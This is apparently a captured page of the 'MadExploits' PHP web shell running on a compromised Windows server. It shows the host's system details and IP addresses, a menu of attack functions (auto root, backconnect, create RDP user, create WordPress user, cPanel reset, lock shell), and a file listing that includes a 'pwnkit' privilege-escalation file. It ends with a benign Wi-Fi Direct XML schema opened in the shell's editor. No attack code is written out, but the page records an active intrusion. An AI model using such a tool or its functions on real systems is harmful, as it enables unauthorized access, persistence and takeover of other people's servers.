Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.139
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
Windows /
L2Schemas /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
LAN_policy_v1.xsd
3.39
KB
-rw-rw-rw-
LAN_profile_v1.xsd
2.19
KB
-rw-rw-rw-
OneX_v1.xsd
5.82
KB
-rw-rw-rw-
WFD_profile_v1.xsd
7.8
KB
-rw-rw-rw-
WLANAP_profile_v1.xsd
7.37
KB
-rw-rw-rw-
WLAN_policy_v1.xsd
7.45
KB
-rw-rw-rw-
WLAN_profile_v1.xsd
15.76
KB
-rw-rw-rw-
WLAN_profile_v2.xsd
2.28
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : WFD_profile_v1.xsd
<?xml version="1.0" encoding="UTF-8" ?> <xs:schema targetNamespace="http://www.microsoft.com/networking/WiFiDirect/profile/v1" xmlns="http://www.microsoft.com/networking/WiFiDirect/profile/v1" xmlns:xs="http://www.w3.org/2001/XMLSchema" elementFormDefault="qualified"> <xs:element name="WFDProfile"> <xs:complexType> <xs:sequence> <xs:element name="groupName"> <xs:annotation> <xs:documentation xml:lang="en"> This defines a friendly name for this Wi-Fi Direct group profile. </xs:documentation> </xs:annotation> <xs:simpleType> <xs:restriction base="xs:string"> <xs:minLength value="1" /> <xs:maxLength value="255" /> </xs:restriction> </xs:simpleType> </xs:element> <xs:element name="groupID"> <xs:complexType> <xs:sequence> <xs:element name="deviceAddress"> <xs:annotation> <xs:documentation xml:lang="en"> Defines the Device Address portion of the group info. If this is a local GO profile, it is the local hardware's device address, otherwise it's the remote device's address. </xs:documentation> </xs:annotation> <xs:simpleType> <xs:restriction base="xs:string"> <xs:pattern value="[A-Fa-f0-9]{2}:[A-Fa-f0-9]{2}:[A-Fa-f0-9]{2}:[A-Fa-f0-9]{2}:[A-Fa-f0-9]{2}:[A-Fa-f0-9]{2}" /> </xs:restriction> </xs:simpleType> </xs:element> <xs:element name="SSID" minOccurs="0"> <xs:annotation> <xs:documentation xml:lang="en"> Defines the SSID portion of the group info. It must begin with DIRECT-XY, where XY are 2 randomly assigned letters/numbers. </xs:documentation> </xs:annotation> <xs:simpleType> <xs:restriction base="xs:string"> <xs:minLength value="1" /> <xs:maxLength value="32" /> <xs:pattern value="^DIRECT-[a-zA-Z0-9]{2}.*" /> </xs:restriction> </xs:simpleType> </xs:element> </xs:sequence> </xs:complexType> </xs:element> <xs:element name="persistent" type="xs:boolean" default="true" minOccurs="0"> <xs:annotation> <xs:documentation xml:lang="en"> Whether or not the group was persistent at the time of pairing. This will affect how a local GO is advertised, and will dictate whether or not reinvoke invitation will be supported. Group is automatically persistent unless otherwise speficied. </xs:documentation> </xs:annotation> </xs:element> <xs:element name="localSettings"> <xs:complexType> <xs:sequence> <xs:element name="role"> <xs:annotation> <xs:documentation xml:lang="en"> The Wi-Fi Direct role which the local computer assumed at the time of pairing. This will dictate what kind of role will be loaded. </xs:documentation> </xs:annotation> <xs:simpleType> <xs:restriction base="xs:string"> <xs:enumeration value="Client" /> <xs:enumeration value="GroupOwner" /> </xs:restriction> </xs:simpleType> </xs:element> <xs:element name="deviceAddress"> <xs:annotation> <xs:documentation xml:lang="en"> Defines the Device Address of the PC at the time of pairing. </xs:documentation> </xs:annotation> <xs:simpleType> <xs:restriction base="xs:string"> <xs:pattern value="[A-Fa-f0-9]{2}:[A-Fa-f0-9]{2}:[A-Fa-f0-9]{2}:[A-Fa-f0-9]{2}:[A-Fa-f0-9]{2}:[A-Fa-f0-9]{2}" /> </xs:restriction> </xs:simpleType> </xs:element> </xs:sequence> </xs:complexType> </xs:element> <xs:element name="security"> <xs:complexType> <xs:sequence> <xs:element name="authentication" minOccurs="0"> <xs:annotation> <xs:documentation xml:lang="en"> Authentication type for this group. This is an optional element. The default value in its absence is WPA2PSK. </xs:documentation> </xs:annotation> <xs:simpleType> <xs:restriction base="xs:string"> <xs:enumeration value="WPA2PSK" /> </xs:restriction> </xs:simpleType> </xs:element> <xs:element name="encryption" minOccurs="0"> <xs:annotation> <xs:documentation xml:lang="en"> Encryption type for this group. This is an optional element. The default value in its absence is AES. </xs:documentation> </xs:annotation> <xs:simpleType> <xs:restriction base="xs:string"> <xs:enumeration value="AES" /> </xs:restriction> </xs:simpleType> </xs:element> <xs:element name="groupKey"> <xs:annotation> <xs:documentation xml:lang="en"> The network key for this group. </xs:documentation> </xs:annotation> <xs:complexType> <xs:sequence> <xs:element name="keyType"> <xs:simpleType> <xs:restriction base="xs:string"> <xs:enumeration value="networkKey" /> <xs:enumeration value="passPhrase" /> </xs:restriction> </xs:simpleType> </xs:element> <xs:element name="protected" type="xs:boolean" /> <xs:element name="keyMaterial" type="xs:string" /> </xs:sequence> </xs:complexType> </xs:element> <xs:element name="legacyKey" minOccurs="0"> <xs:annotation> <xs:documentation xml:lang="en"> The legacy client key for this network. Useful only if this is a local GO profile. Optional. </xs:documentation> </xs:annotation> <xs:complexType> <xs:sequence> <xs:element name="keyType"> <xs:simpleType> <xs:restriction base="xs:string"> <xs:enumeration value="passPhrase" /> </xs:restriction> </xs:simpleType> </xs:element> <xs:element name="protected" type="xs:boolean" /> <xs:element name="keyMaterial" type="xs:string" /> </xs:sequence> </xs:complexType> </xs:element> </xs:sequence> </xs:complexType> </xs:element> </xs:sequence> </xs:complexType> </xs:element> </xs:schema>
Close